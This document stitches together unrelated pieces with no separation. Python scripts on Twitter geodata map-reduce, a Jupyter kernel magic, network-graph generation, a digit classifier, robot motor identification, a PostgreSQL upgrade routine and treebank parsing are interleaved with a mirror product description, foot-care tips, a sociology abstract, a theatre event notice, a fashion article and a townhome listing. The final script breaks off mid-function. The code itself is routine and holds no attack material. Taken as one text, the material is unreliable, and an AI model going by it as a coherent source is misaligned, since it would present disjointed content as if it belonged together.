import simplekml import json import datetime import csv from bson.code import Code from pymongo import MongoClient from math import radians, cos, sin, asin, sqrt from random import choice import operator import csv def haversine(lon1, lat1, lon2, lat2): """ Calculate the great circle distance between two points on the earth (specified in decimal degrees) """ # convert decimal degrees to radians lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2]) # haversine formula dlon = lon2 - lon1 dlat = lat2 - lat1 a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2 c = 2 * asin(sqrt(a)) km = 6367 * c return km def closest_negighbor(geo_dict): data = {} if geo_dict['n_loc'] == 1: data['user'] = geo_dict['user'] data['loc'] = geo_dict['location'][0] elif geo_dict['n_loc'] == 2: data['user'] = geo_dict['user'] data['loc'] = choice(geo_dict['location']) elif geo_dict['n_loc'] > 2: pt_dict = {} for i in range(len(geo_dict['location'])): distance_list = [] for j in range(len(geo_dict['location'])): distance = haversine(geo_dict['location'][i][0],geo_dict['location'][i][1],geo_dict['location'][j][0],geo_dict['location'][j][1]) distance_list.append(distance) pt_dict[i] = reduce(lambda x, y: x + y, distance_list) / len(distance_list) data['user'] = geo_dict['user'] data['loc'] = geo_dict['location'][max(pt_dict.iteritems(), key=operator.itemgetter(1))[0]] else: return data data['n_loc'] = geo_dict['n_loc'] return data def map_points(input_file): geo_stuff = tw_spanish.map_reduce(mapper,reducer, "results") #print geo_stuff count = 0 geo_dict = {} with open('./testmap_spanish_user.csv', 'wb') as csvfile: mapwriter = csv.writer(csvfile) mapwriter.writerow(['user','latitude','longitude','n_loc']) for doc in geo_stuff.find(): geo_dict['user'] = doc['_id']['user'] value = doc['value'] if 'Geo' in value: geo_dict['location'] = [value['Geo']] geo_dict['n_loc'] = 1 elif 'Geo_list' in value: geo_dict['location'] = value['Geo_list'] geo_dict['n_loc'] = value['n_pts'] geo_data = closest_negighbor(geo_dict) if geo_data != {}: mapwriter.writerow([geo_data['user'],geo_data['loc'][0],geo_data['loc'][1], geo_data['n_loc']]) print geo_data count += 1 print count # f = open(input_file, "r" ) # with open('./testmap_spanish.csv', 'wb') as csvfile: # mapwriter = csv.writer(csvfile) # mapwriter.writerow(['time','latitude','longitude']) # for each in f: # tmp = each.split('\t') # time = datetime.datetime.strptime(tmp[0][0:-5], '%Y-%m-%dT%H:%M:%S') # geo = tmp[1].strip().split(', ') # #print time, geo # row = [] # row.append(time) # row.append(geo[0]) # row.append(geo[1]) # try: # mapwriter.writerow(row) # except: # mapwriter.writerow([unicode(s).encode("utf-8") for s in row]) if __name__ == '__main__': client = MongoClient() db = client.twitter_test tw_spanish = db.spanish_tweets mapper = Code("""function () { emit({user:this.actor.id},{Geo: this.geo.coordinates}); } """ ) reducer = Code("""function(key,values) { var list = []; var count = 0; values.forEach(function(value) { if(value.Geo){ list.push(value.Geo); count+=1; } }) return {Geo_list:list, n_pts:count}; } """ ) ifile = './output.txt' map_points(ifile)
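A quick sanity check for the haversine() helper above; the Paris and London coordinates are illustrative values, not data from the script. Note that the function takes longitude before latitude.
paris = (2.3522, 48.8566)      # (lon, lat)
london = (-0.1278, 51.5074)    # (lon, lat)
d = haversine(paris[0], paris[1], london[0], london[1])
print d   # roughly 343 km with the 6367 km Earth radius used above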
Contemporary mirror, sculpted in bronze. The top surface shifts gradually from rough to polished, resulting in a worn effect. This, in combination with the earthy colours, makes it a remarkable item. Part of the Synthesis Monolith series. When confronted with things that exceed our very understanding, our inability to categorise and relate to them commands our full attention. The Monolith is a mysterious extraterrestrial artefact of unknown origin and nature. Its aesthetic concept touches upon the divine, the omnipotent, indefinable creator of human civilisation. The future is a place where the complexity of both natural and technical processes can converge. This convergence will usher in a new aesthetic paradigm where objects are created to inspire awe and present a mystical form in which both naturally grown and machine-processed materials and textures seamlessly coexist. At first glance, these objects appear naturally formed. Upon closer examination, traces of technology reveal their mystical purpose: to encourage a new perception that oscillates between a sense of the natural and the technological--and the fleeting illusion of their convergence.
# Copyright 2019 TWO SIGMA OPEN SOURCE, LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from IPython import get_ipython from IPython.core.magic import (magics_class, cell_magic, Magics) from beakerx_magics import KernelMagics from ipykernel.zmqshell import ZMQInteractiveShell @magics_class class KernelRunnerMagic(Magics): kernels = {} def __init__(self, shell): super(KernelRunnerMagic, self).__init__(shell) @cell_magic def kernel(self, line, cell): if line not in self.kernels: km = KernelMagics(self.shell) km.start(line) self.kernels[line] = km return self.kernels[line].run_cell(line, cell) def load_ipython_extension(ipython): if isinstance(ipython, ZMQInteractiveShell): ipython.register_magics(KernelRunnerMagic) if __name__ == '__main__': ip = get_ipython() ip.register_magics(KernelRunnerMagic)
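Once the magic is registered (via load_ipython_extension or the __main__ block above), it could be driven as sketched below; the 'groovy' kernel name and the cell body are illustrative assumptions, not part of the original module.
# Programmatic equivalent of a "%%kernel groovy" notebook cell: the first call
# starts the named kernel through KernelMagics.start(), and later calls with
# the same name reuse the instance cached in self.kernels.
ip = get_ipython()
ip.run_cell_magic('kernel', 'groovy', 'println("hello from the groovy kernel")')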
As chiropodists and podiatrists, we are always asked for our top tips when it comes to looking after feet. Here we have included a few for you to try. Go on... give your feet a treat! It doesn't have to be a really expensive moisturiser, but the best results are usually seen with creams that include ingredients such as vitamin E and urea. The key is applying it little and often. It will not stop your hard skin altogether but should stop the build-up irritating you as quickly. Use a pumice stone or rough emery board to maintain soft feet temporarily after a chiropody treatment, although it is wise to avoid using a pumice stone on verrucae as this could spread them. Avoid the temptation to cut down the sides. If you are experiencing pain, see a chiropodist for advice. The reason we advise not cutting down the sides is that, as well as risking making the problem worse, you can introduce infection to the sides of your nail. All our instruments are sterile, so if it is really necessary to cut down the sides, this is a much safer way of rectifying the problem. It's not that heels are always a no-no, but just ensure that the toe box is deep enough to wiggle your toes and that they are not pinching at the edges of your feet. Ideally, soft, flat lace-up shoes are best as then, when the feet swell over the course of a day, the laces can be slackened to accommodate the expansion in the foot. See a chiropodist regularly for general maintenance and straight away should you have any concerns over your foot or leg health.
#!/usr/bin/python -u # # Copyright (c) 2016 Balazs Nemeth # # This file is free software: you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This file is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with POX. If not, see <http://www.gnu.org/licenses/>. import importlib import random import string from sg_generator import NameGenerator from generator import NFFG def get_networkx_func (func_name, seed=0, **kwargs): """ Uses 'func_name' graph generator of NetworkX library to create a NetworkX graph which can be used as topology. """ nx_func = getattr(importlib.import_module("networkx"), func_name) generated_graph = nx_func(seed=seed, **kwargs) return generated_graph def networkx_resource_generator (func_name, seed=0, max_cpu=40, max_mem=16000, max_storage=30, max_link_bw=70, abc_nf_types_len=10, supported_nf_cnt=6, max_link_delay=2, sap_cnt=10, **kwargs): """ Uses a NetworkX graph to create a request NFFG. :param func_name: string of NetworkX lib's random graph generator function name :param seed: :param max_cpu: :param max_mem: :param max_storage: :param max_link_bw: :param abc_nf_types_len: :param supported_nf_cnt: :param max_link_delay: :param sap_cnt: :param kwargs: :return: """ rnd = random.Random() rnd.seed(seed) nx_graph = get_networkx_func(func_name, seed=seed, **kwargs) nf_types = list(string.ascii_uppercase)[:abc_nf_types_len] nffg = NFFG(id="net-" + func_name + "-seed" + str(seed)) gen = NameGenerator() for infra_id in nx_graph.nodes_iter(): infra = nffg.add_infra(id=infra_id, bandwidth=rnd.random() * max_link_bw * 1000, cpu=rnd.random() * max_cpu, mem=rnd.random() * max_mem, storage=rnd.random() * max_storage) infra.add_supported_type(rnd.sample(nf_types, supported_nf_cnt)) for i, j in nx_graph.edges_iter(): infra1 = nffg.network.node[i] infra2 = nffg.network.node[j] nffg.add_undirected_link(port1=infra1.add_port(id=gen.get_name("port")), port2=infra2.add_port(id=gen.get_name("port")), p1p2id=gen.get_name("link"), p2p1id=gen.get_name("link"), dynamic=False, delay=rnd.random() * max_link_delay, bandwidth=rnd.random() * max_link_bw) infra_ids = [i.id for i in nffg.infras] for s in xrange(0, sap_cnt): sap_obj = nffg.add_sap(id=gen.get_name("sap")) sap_port = sap_obj.add_port(id=gen.get_name("port")) infra_id = rnd.choice(infra_ids) infra = nffg.network.node[infra_id] nffg.add_undirected_link(port1=sap_port, port2=infra.add_port(id=gen.get_name("port")), p1p2id=gen.get_name("link"), p2p1id=gen.get_name("link"), dynamic=False, delay=rnd.random() * max_link_delay, bandwidth=rnd.uniform(max_link_bw / 2.0, max_link_bw)) return nffg def networkx_request_generator (func_name, seed=0, max_cpu=4, max_mem=1600, max_storage=3, max_link_bw=7, abc_nf_types_len=10, max_link_delay=2, sap_cnt=10, **kwargs): rnd = random.Random() rnd.seed(seed) nx_graph = get_networkx_func(func_name, seed=seed, **kwargs) nf_types = list(string.ascii_uppercase)[:abc_nf_types_len] nffg = NFFG(id="req-" + func_name + "-seed" + str(seed)) nffg.mode = NFFG.MODE_ADD for nf_id in nx_graph.nodes_iter(): nf = nffg.add_nf(id=nf_id, func_type=rnd.choice(nf_types), cpu=rnd.random() * max_cpu, mem=rnd.random() * 
max_mem, storage=rnd.random() * max_storage) for i, j in nx_graph.edges_iter(): """TODO: How to direct the randomly generated graph's edges.""" pass return nffg if __name__ == "__main__": print networkx_resource_generator("erdos_renyi_graph", seed=5, n=6, p=0.3, sap_cnt=15).dump()
Current laws in many countries around the world, and in EU member-states in particular, have made the consultation of affected publics mandatory for such decisions as the siting of energy facilities, urban rehabilitation or the designation of protected areas. This has made exercises of public engagement a generalized practice. However, the growing literature that addresses the perspectives of experts (scientists and decision-makers) about this engagement shows how the public is systematically constructed as unresponsive, indifferent, as needing information more than participation, and as appeasable by having certain specific concerns addressed. This 'imagined public' works as a rationale for experts to opt, most of the time, for weak versions of public engagement, and this, in turn, contributes to reproducing and perpetuating an old image of the public under the new legislation. However, there is one further dimension that is crucial for understanding the dynamics of public engagement: knowing how the publics imagine themselves and whether or not these imaginations reproduce the models of the public with which the experts work. Yet, this is a much less studied topic. In this presentation we will look at how the publics imagine themselves. We present data from 9 focus groups with rural communities subjected to decisions linked to Natura 2000 biodiversity protection laws. The residents describe episodes of local civic engagement and talk about barriers and facilitators to engagement. The analyses show that, in several dimensions, the residents lack new forms of imagination, i.e., they imagine themselves as they are imagined by the experts. Other aspects are, however, contested, and the will to participate never leaves the discourses, thus opening space for agency and for new formats of engagement, even if these are not very specific. The consequences of this for governance and the advancement of environmental goals are discussed. Castro, Paula, Carla Mouro, and Leonor Bettencourt. "Imagining ourselves as participating publics: an example from biodiversity governance." In Transitions to sustainable societies: Designing research and policies for changing lifestyles and communities. IAPS. Timisoara, Romania, 2014. Devine-Wright, P. "Investigating the Role of Procedural Justice in Explaining Different Forms of Protest Behaviours: a Powerline Case Study." In Human Experience in the Natural and Built Environment: Implications for Research, Policy and Practice (IAPS 22 Conference, Abstracts of Presentations). IAPS. Glasgow, UK: University of Strathclyde, 2012.
import scipy.io as sio import matplotlib.pyplot as plt import numpy as np from scipy.optimize import minimize from common_functions import add_zero_feature, cf_lr as cost_function, gf_lr as grad_function, \ cf_lr_reg as cost_function_reg, gf_lr_reg as grad_function_reg if __name__ == '__main__': data = sio.loadmat('ex3data1.mat') y = data['y'] X = data['X'] # replace 10 by 0 y = y % 10 n_sampels = 100 sampels = np.random.choice(len(X), n_sampels) fig = plt.figure(figsize=(8, 8)) # figure size in inches fig.subplots_adjust(left=0, right=1, bottom=0, top=1, hspace=0.05, wspace=0.05) for i, j in enumerate(sampels): ax = fig.add_subplot(10, 10, i + 1, xticks=[], yticks=[]) ax.imshow(X[j, :].reshape(20, 20).T, cmap=plt.cm.binary, interpolation='nearest') ax.text(0, 7, str(y[j, 0])) plt.show() num_labels = 10 X = add_zero_feature(X) m, n = X.shape initial_theta = np.ones((n, 1)) all_theta = np.vstack([minimize(cost_function, initial_theta, method='BFGS', jac=grad_function, options={'disp': True, 'maxiter':100}, args=(X, (y == i).astype(int))).x for i in range(num_labels)]) y_pred = np.argmax(np.dot(X, all_theta.T), axis=1) print 'Training Set Accuracy: {}'.format(np.mean(y_pred == y.ravel()) * 100) # Use regularization lambda_coef = 0.1 all_theta = np.vstack([minimize(cost_function_reg, initial_theta, method='BFGS', jac=grad_function_reg, options={'disp': True, 'maxiter':100}, args=(X, (y == i).astype(int), lambda_coef)).x for i in range(num_labels)]) y_pred = np.argmax(np.dot(X, all_theta.T), axis=1) print 'Training Set Accuracy: {}'.format(np.mean(y_pred == y.ravel()) * 100)
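As a small illustration of how the trained one-vs-all classifiers are applied, the sketch below scores a single, arbitrarily chosen sample; the sigmoid can be skipped because it is monotonic, so the argmax over the linear scores yields the same label.
i = 1500                                  # illustrative sample index
scores = np.dot(X[i], all_theta.T)        # one linear score per digit 0..9
print 'predicted: {}, actual: {}'.format(np.argmax(scores), y[i, 0])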
Grab your group and join us for this complimentary pre-show mixer for groups of 10 or more. Mix and mingle with members of other theatre-loving groups while enjoying music, complimentary cocktails and appetizers provided by Mandola's Catering. Tickets are $28. InterACT is a great way to mix and mingle prior to seeing the performance. Treat your group to an evening of fun and come interact with the Alley – space is limited so call today! Contact the Group Sales Department at 713.315.3346 or email [email protected] to purchase tickets, inquire about group rates, seat availability, easy payment options and flexible payment due dates. If you have a promo code, click the Buy Tickets button below and enter your promo code. Winner of the 1981 Pulitzer Prize and New York Drama Critics Circle Award, Beth Henley's first play brings you to the Mississippi home of the Magrath sisters. Warm-hearted, irreverent, and imaginative, Crimes of the Heart teems with humanity as the sisters forgive the past, face the present, and embrace the future. Renowned director Theresa Rebeck returns to the Alley to direct.
# -*- coding: utf-8 -*- """ Created on Tue Sep 12 18:47:50 2017 @author: adelpret """ import numpy as np from scipy import ndimage import matplotlib.pyplot as plt from identification_utils import solve1stOrderLeastSquare from dynamic_graph.sot.torque_control.hrp2.control_manager_conf import IN_OUT_GAIN def identify_motor_static(enc, dq, ctrl, current, tau, JOINT_ID, JOINT_NAME, ZERO_VELOCITY_THRESHOLD, ZERO_VELOCITY_THRESHOLD_SMALL, SHOW_THRESHOLD_EFFECT): # remove high velocity maskConstAng = (abs (dq)<ZERO_VELOCITY_THRESHOLD) # erode to get only steady phases where velocity is small maskConstAng=ndimage.morphology.binary_erosion(maskConstAng,None,100) maskPosVel=(dq> ZERO_VELOCITY_THRESHOLD_SMALL) maskNegVel=(dq<-ZERO_VELOCITY_THRESHOLD_SMALL) maskConstPosAng=np.logical_and( maskConstAng ,maskPosVel ) maskConstNegAng=np.logical_and( maskConstAng ,maskNegVel ) if SHOW_THRESHOLD_EFFECT : plt.figure() plt.plot(enc, label='q') q_const=enc.copy() q_const[np.logical_not(maskConstAng)]=np.nan plt.plot(q_const, label='q_const') plt.legend() # identify current sensor gain x = current[maskConstAng] y = ctrl[maskConstAng]/IN_OUT_GAIN maskPosErr = np.logical_and(y - x > 0.0, np.abs(x)>0.5) maskNegErr = np.logical_and(y - x < 0.0, np.abs(x)>0.5) print "Number of samples with constant angle:", x.shape[0] print "Number of samples with constant angle and pos vel:", x[maskPosErr].shape[0] print "Number of samples with constant angle and neg vel:", x[maskNegErr].shape[0] if(x[maskPosErr].shape[0]<10): (Ks,DZ)=solve1stOrderLeastSquare(x[maskNegErr], y[maskNegErr]) elif(x[maskNegErr].shape[0]<10): (Ks,DZ)=solve1stOrderLeastSquare(x[maskPosErr], y[maskPosErr]) else: (Ksn,DZn)=solve1stOrderLeastSquare(x[maskNegErr], y[maskNegErr]) (Ksp,DZp)=solve1stOrderLeastSquare(x[maskPosErr], y[maskPosErr]) Ks = 0.5*(Ksp+Ksn); Ks = min([Ksp, Ksn]); DZ = 0.5*(DZp-DZn); print "Current sensor gains = ", Ksp, Ksn; print "Deadzones = ", DZp, -DZn; x_neg = x[maskNegErr] y_neg = y[maskNegErr] plt.figure() plt.plot(x_neg, y_neg,'.' ,lw=3,markersize=1,c='0.5'); plt.plot([min(x_neg),max(x_neg)],[Ksn*min(x_neg)+DZn ,Ksn*max(x_neg)+DZn],'g:',lw=3) plt.ylabel(r'$i(t)$'); plt.xlabel(r'$u(t)$') plt.title('Negative current errors - Joint '+JOINT_NAME) x_pos = x[maskPosErr] y_pos = y[maskPosErr] plt.figure() plt.plot(x_pos, y_pos,'.' ,lw=3,markersize=1,c='0.5'); plt.plot([min(x_pos),max(x_pos)],[Ksp*min(x_pos)+DZp ,Ksp*max(x_pos)+DZp],'g:',lw=3) plt.ylabel(r'$i(t)$'); plt.xlabel(r'$u(t)$') plt.title('Positive current errors - Joint '+JOINT_NAME) plt.show() if(Ks<0.0): print "ERROR: estimated Ks is negative! Setting it to 1" Ks = 1.0; # plot dead zone effect ******************************************** plt.figure() plt.plot(Ks*current, label='current') plt.plot(ctrl/IN_OUT_GAIN, label='control') plt.legend() plt.figure() y = Ks*current[maskConstAng] x = ctrl[maskConstAng]/IN_OUT_GAIN - Ks*current[maskConstAng] plt.ylabel(r'$i(t)$') plt.xlabel(r'$ctrl(t)-i(t)$') plt.plot(x,y,'.' ,lw=3,markersize=1,c='0.5'); plt.plot(x[maskPosErr],y[maskPosErr],'rx',lw=3,markersize=1, label='pos err'); plt.plot(x[maskNegErr],y[maskNegErr],'bx',lw=3,markersize=1, label='neg err'); plt.legend() plt.figure() y = ctrl[maskConstAng]/IN_OUT_GAIN x = ctrl[maskConstAng]/IN_OUT_GAIN - Ks*current[maskConstAng] plt.ylabel(r'$ctrl(t)$') plt.xlabel(r'$ctrl(t)-i(t)$') plt.plot(x,y,'.' 
,lw=3,markersize=1,c='0.5'); plt.plot(x[maskPosErr],y[maskPosErr],'rx',lw=3,markersize=1, label='pos err'); plt.plot(x[maskNegErr],y[maskNegErr],'bx',lw=3,markersize=1, label='neg err'); plt.legend() plt.figure() y = ctrl/IN_OUT_GAIN x = Ks*current plt.ylabel(r'$ctrl(t)$') plt.xlabel(r'$i(t)$') plt.plot(x,y,'.' ,lw=3,markersize=1,c='0.5'); plt.plot([-3,3],[-3,3]); plt.show() # y = a. x + b # i = Kt.tau + Kf # Identification *************************************************** y = current #*Ks x = tau (Ktp,Kfp)=solve1stOrderLeastSquare(x[maskConstPosAng],y[maskConstPosAng]) (Ktn,b)=solve1stOrderLeastSquare(x[maskConstNegAng],y[maskConstNegAng]) Kfn=-b # Plot ************************************************************* plt.figure() plt.axhline(0, color='black',lw=1) plt.axvline(0, color='black',lw=1) plt.plot(x ,y ,'.' ,lw=3,markersize=1,c='0.5'); plt.plot(x[maskConstPosAng],y[maskConstPosAng],'rx',lw=3,markersize=1); plt.plot(x[maskConstNegAng],y[maskConstNegAng],'bx',lw=3,markersize=1); #plot identified lin model plt.plot([min(x),max(x)],[Ktp*min(x)+Kfp ,Ktp*max(x)+Kfp],'g:',lw=3) plt.plot([min(x),max(x)],[Ktn*min(x)-Kfn ,Ktn*max(x)-Kfn],'g:',lw=3) plt.ylabel(r'$i(t)$') plt.xlabel(r'$\tau(t)$') plt.title('Static experiment - Joint '+JOINT_NAME) print "cur_sens_gain[%d] = %f" % (JOINT_ID, Ks); print 'deadzone[%d] = %f' % (JOINT_ID, DZ); print 'Kt_p[%d] = %f' % (JOINT_ID,Ktp); print 'Kt_n[%d] = %f' % (JOINT_ID,Ktn); print 'Kf_p[%d] = %f' % (JOINT_ID,Kfp); print 'Kf_n[%d] = %f' % (JOINT_ID,Kfn); print 'Kt_m[%d] = %f' % (JOINT_ID,(Ktp+Ktn)/2.0); print 'Kf_m[%d] = %f' % (JOINT_ID,(Kfp+Kfn)/2.0); return (Ktp, Ktn, Ks, DZ);
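Note: identify_motor_static relies on solve1stOrderLeastSquare from identification_utils, which is not included in this listing. Assuming it fits the first-order model y = a*x + b in the least-squares sense and returns the (slope, offset) pair, matching how (Ks, DZ) and (Kt, Kf) are unpacked above, a minimal sketch could be:

import numpy as np

def solve1stOrderLeastSquare(x, y):
    # Hypothetical stand-in for the unseen identification_utils helper:
    # fit y = a*x + b by ordinary least squares and return (a, b).
    A = np.vstack([x, np.ones_like(x)]).T
    a, b = np.linalg.lstsq(A, y, rcond=None)[0]
    return (a, b)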
From fashion designers to apparel retailers, the fashion and retail industry has brought some people great wealth, success and prosperity. When you look at people with successful careers in fashion and retail, you instantly wonder how they got there. Here you will read some inspiring stories of successful people in fashion and retail. While success is achieved only through a combination of hard work, luck and perfect timing, their origin stories can be intriguing, and they offer lessons that anyone can learn from and take home. Some famous people in the fashion and retail industry opted for unconventional routes and said ‘yes’ to almost everything in the early stages of their careers. Going that extra mile set them apart from competitors and stretched their creative capabilities. Others have succeeded by combining digital tactics with their passion for fashion. Believe it or not, passion is the key in the fashion industry. Because the digital field is now vital to the business, you should be ready to keep learning as well. Taking risks is important too, as any right or wrong decision can have a great impact on a designer’s performance and creativity. A fashion enthusiast should be determined and ready to ride a rollercoaster every day. These inspiring stories of people in fashion and retail will give you an idea of how they became known names in the industry, and what it took to get there.
# # Copyright (c) SAS Institute Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """ Shut down PostgreSQL, check if it needs updating, then start it again. """ import logging import optparse import os import signal import subprocess import tempfile import time import traceback from conary.lib import cfg as cfgmod from conary.lib import cfgtypes from conary.lib import util as cny_util from mint import config from mint.scripts import postgres_major_migrate log = logging.getLogger('auto_update') class PostgresMeta(cfgmod.ConfigFile): version = cfgtypes.CfgString binDir = cfgtypes.CfgPath dataDir = cfgtypes.CfgPath class Script(postgres_major_migrate.Script): logFileName = 'scripts.log' newLogger = True port = 5439 user = 'postgres' dataTop = '/srv/pgsql' currentMetaPath = '/srv/rbuilder/data/postgres-meta' nextMetaPath = '/usr/share/rbuilder/postgres-meta' def action(self): parser = optparse.OptionParser() parser.add_option('-c', '--config-file', default=config.RBUILDER_CONFIG) parser.add_option('-q', '--quiet', action='store_true') parser.add_option('--init', action='store_true') options, args = parser.parse_args() self.loadConfig(options.config_file) self.resetLogging(quiet=options.quiet) currentMeta = self.getCurrentMeta() nextMeta = self.getNextMeta() if currentMeta and currentMeta.dataDir == nextMeta.dataDir: return 0 self.stopPostgres() if not currentMeta: self.initdb(nextMeta) else: self.migrateMeta(currentMeta, nextMeta) self.startPostgres() def stopPostgres(self): """Kill postgres by checking its UNIX socket.""" log.info("Stopping PostgreSQL on port %s", self.port) sockPath = '/tmp/.s.PGSQL.%s' % self.port # Send progressively more aggressive sigals until it dies. signals = ([signal.SIGINT] * 4 ) + ([signal.SIGQUIT] * 2 ) + [signal.SIGKILL] while signals: if not os.path.exists(sockPath): return signum = signals.pop(0) if not self._stopPostgres(sockPath, signum): # No process is listening on that socket. return sleepUntil = time.time() + 15 while time.time() < sleepUntil: if not os.path.exists(sockPath): return time.sleep(0.1) @staticmethod def _stopPostgres(sockPath, signal): # Use netstat to figure out what processes own the socket. netstat = subprocess.Popen(['netstat', '-lpnxT'], shell=False, stdout=subprocess.PIPE).communicate()[0] found = False for line in netstat.splitlines(): words = line.split() if sockPath not in words: continue i = words.index(sockPath) process = words[i-1] pid, name = process.split('/') if name not in ('postmaster', 'postgres'): continue os.kill(int(pid), signal) found = True return found def getCurrentMeta(self): """Get metadata about the current PostgreSQL cluster.""" cfg = PostgresMeta() if os.path.exists(self.currentMetaPath): cfg.read(self.currentMetaPath) return cfg # rBuilder <= 5.8.0 doesn't have a meta file. Use the highest-numbered # datadir as the "current" cluster. 
if not os.path.isdir(self.dataTop): return None versions = [] for name in os.listdir(self.dataTop): if name[-9:] != '-rbuilder': continue path = os.path.join(self.dataTop, name) version = name[:-9] try: parts = [int(x) for x in version.split('.')] except ValueError: continue versions.append((parts, version, path)) if not versions: # No postgres data dir found. return None versions.sort() _, cfg.version, cfg.dataDir = versions[-1] cfg.binDir = '/opt/postgresql-%s/bin' % (cfg.version,) cfg.writeToFile(self.currentMetaPath, includeDocs=False) return cfg def getNextMeta(self): """Get metadata about the version of PostgreSQL that will be used after the (possible) upgrade. """ cfg = PostgresMeta() cfg.read(self.nextMetaPath) return cfg def updateMeta(self, nextMeta): """Update the "current" metadata file.""" nextMeta.writeToFile(self.currentMetaPath, includeDocs=False) def initdb(self, meta): """Create a new postgres cluster at the given location.""" log.info("Initializing PostgreSQL %s cluster", meta.version) assert not os.path.exists(meta.dataDir) self.loadPrivs(user=self.user) parentDir = os.path.dirname(meta.dataDir) if not os.path.isdir(parentDir): os.makedirs(parentDir) tempDir = tempfile.mkdtemp(dir=parentDir) try: os.chown(tempDir, self.uidgid[0], self.uidgid[1]) self.dropPrivs() cluster = postgres_major_migrate.Postmaster(dataDir=tempDir, binDir=meta.binDir, port=65000, logPath='/tmp/postgres-initdb.log') cluster.initdb() self.restorePrivs() self.updateMeta(meta) os.rename(tempDir, meta.dataDir) finally: try: if os.path.isdir(tempDir): try: self.restorePrivs() except: traceback.print_exc() log.info("Cleaning up temporary target dir") cny_util.rmtree(tempDir) except: traceback.print_exc() def migrateMeta(self, currentMeta, nextMeta): """Migrate postgres cluster to a new version and datadir.""" log.info("Migrating PostgreSQL from %s to %s", currentMeta.version, nextMeta.version) assert currentMeta.dataDir != nextMeta.dataDir if os.path.exists(nextMeta.dataDir): # Nuke any existing data directory -- either an explicit meta file # told us that a different datadir is in use, or the heuristic # decided there was nothing of value in this one. cny_util.rmtree(nextMeta.dataDir) self.runMigration( from_bindir=currentMeta.binDir, from_datadir=currentMeta.dataDir, from_port=None, to_bindir=nextMeta.binDir, to_datadir=nextMeta.dataDir, user=self.user, ) self.updateMeta(nextMeta) os.rename(currentMeta.dataDir, currentMeta.dataDir + '.old') def startPostgres(self): os.system("/sbin/service postgresql-rbuilder start") cluster = postgres_major_migrate.DummyCluster(self.port, user=self.user) cluster.waitForPostgres()
BEAUTIFUL, BRIGHT, NEUTRAL CAMDEN MODEL. 1700 SQ FT, TWO-STORY SOARING RAILED ENTRY AND LIVING ROOM. MARBLE SURROUND GAS FIREPLACE. LARGE, FULLY-APPLIANCED KITCHEN, BREAKFAST BAR. OAK CABINETS. HUGE EATING AREA WITH SLIDERS TO PATIO. HUGE MASTER SUITE AND BATH. TRUE 3-BEDROOM, 2.1 BATH, 2+ CAR GARAGE. VERY NEUTRAL, FANTASTIC SCHOOLS. 815 Blue Spruce Court Lindenhurst, Illinois 60046 is a townhome property, which sold for $129,900. 815 Blue Spruce Court has 3 bedroom(s) and 3 bath(s). Want to learn more about 815 Blue Spruce Court Lindenhurst, Illinois 60046? Contact an @properties agent to request more info.
"""treetools: Tools for transforming treebank trees. This module provides functions and classes for transition extraction. Author: Wolfgang Maier <[email protected]> """ import argparse import sys from . import trees, treeinput, transform from . import misc, transitionoutput class Transition(): def __init__(self, name): self.name = name def pretty_print(self): return self.name def __str__(self): return self.name def topdown(tree): """Extract transitions topdown for continuous trees. """ terminals = [(terminal.data['word'], terminal.data['label']) for terminal in trees.terminals(tree)] transitions = [] for node in trees.preorder(tree): children = trees.children(node) if len(children) == 0: transitions.append(Transition("SHIFT")) elif len(children) == 1: transitions.append(Transition("UNARY-%s" % node.data["label"])) elif len(children) == 2: if 'head' not in children[0].data: raise ValueError("heads are supposed to be marked") headside = "LEFT" if children[0].data['head'] else "RIGHT" transitions.append(Transition("BINARY-%s-%s" % (headside, node.data["label"]))) else: raise ValueError("trees must be binarized") print(terminals, [str(t) for t in list(reversed(transitions))], file=sys.stderr) return terminals, list(reversed(transitions)) def _inorder(tree): """Recursive inorder transition """ transitions = [] c = trees.children(tree) if len(trees.children(c[0])) == 0: transitions.append(Transition("SHIFT")) else: transitions.extend(_inorder(c[0])) transitions.append(Transition("PJ-{}".format(tree.data['label']))) for child in c[1:]: if len(trees.children(child)) == 0: transitions.append(Transition("SHIFT")) else: transitions.extend(_inorder(child)) transitions.append(Transition("REDUCE")) return transitions def inorder(tree): """Extract inorder transitions for continuous trees. """ terminals = [(terminal.data['word'], terminal.data['label']) for terminal in trees.terminals(tree)] transitions = _inorder(tree) return terminals, transitions def gap(tree): """GAP transition parsing (Coavoux & Crabbe) """ terminals = [(terminal.data['word'], terminal.data['label']) for terminal in trees.terminals(tree)] transitions = [] b = [terminal for terminal in trees.terminals(tree)] d = [] s = [] while True: if len(s) > 0 and len(d) > 0 and d[0].parent == s[0].parent: # REDUCE p = s[0].parent if 'head' not in s[0].data or 'head' not in d[0].data: raise ValueError("heads are supposed to be marked") headside = "LEFT" if s[0].data['head'] else "RIGHT" t = Transition("R-{}-{}".format(headside, p.data['label'])) transitions.append(t) s = s[1:] d = d[1:] while len(d) > 0: s = [d.pop(0)] + s d = [p] + d elif len(d) > 0 and any([n.parent == d[0].parent for i,n in enumerate(s)]): # GAP for i, n in enumerate(s): if n.parent == d[0].parent: for j in range(i): d.append(s.pop(0)) t = Transition("GAP") transitions.append(t) break else: t = Transition("SHIFT") transitions.append(t) while len(d) > 0: s = [d.pop(0)] + s d = [b.pop(0)] + d if len(s) == 0 and len(b) == 0 and len(d) == 1: break # check for unary while len(d) > 0 and d[0].parent and len(trees.children(d[0].parent)) == 1: t = Transition("UNARY-{}".format(d[0].parent.data['label'])) transitions.append(t) d[0] = d[0].parent 